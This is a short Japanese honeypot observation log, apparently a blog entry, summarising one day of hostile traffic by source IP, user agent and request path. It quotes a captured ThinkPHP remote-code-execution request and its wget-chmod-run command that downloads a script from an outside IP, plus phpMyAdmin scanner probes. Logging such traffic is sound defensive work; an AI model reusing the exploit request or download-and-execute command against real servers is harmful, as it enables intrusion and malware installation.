ハニーポット(仮) 観測記録
2019/04/23分です。
非常にアクセス数が少なくなりました。
ZmEuでのスキャンのみがきていたような状態です。
thinkphpの脆弱性狙いのリクエストが1件ありました。
以下の動きを狙っているようです。
wget http://81[.]6[.]42[.]123/a_thk.sh -O /tmp/a;
chmod 0777 /tmp/a;
/tmp/a;
総アクセス数:32 (前日比:-856)
都合により
GET / HTTP/1.1
POST / HTTP/1.1
は除いています。
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 18 | 104.236.183.248 | United States |
| 1 | 123.56.49.19 | China |
| 5 | 139.59.23.231 | India |
| 2 | 39.106.146.60 | China |
| 1 | 60.191.52.254 | China |
| 1 | 69.162.100.42 | United States |
| 4 | 94.102.49.193 | Netherlands |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 5 | - |
| 1 | Mozilla/5.0 |
| 1 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 |
| 1 | python-requests/2.10.0 |
| 23 | ZmEu |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /favicon.ico | HTTP/1.1 |
| 1 | GET | /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20http://81[.]6[.]42[.]123/a_thk.sh%20-O%20/tmp/a;%20chmod%200777%20/tmp/a;%20/tmp/a; | HTTP/1.1 |
| 3 | GET | /myadmin/scripts/setup.php | HTTP/1.1 |
| 3 | GET | /MyAdmin/scripts/setup.php | HTTP/1.1 |
| 3 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 3 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/setup.php | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/setup.php | HTTP/1.1 |
| 1 | GET | /phpmy/scripts/setup.php | HTTP/1.1 |
| 3 | GET | /pma/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /robots.txt | HTTP/1.1 |
| 1 | GET | /scripts/setup.php/index.php | HTTP/1.1 |
| 1 | GET | /sitemap.xml | HTTP/1.1 |
| 4 | GET | /w00tw00t.at.blackhats.romanian.anti-sec:) | HTTP/1.1 |
| 1 | GET | /webdav/ | HTTP/1.1 |
| 1 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | HEAD | / | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.1 |
| 1 | PROPFIND | / | HTTP/1.1 |
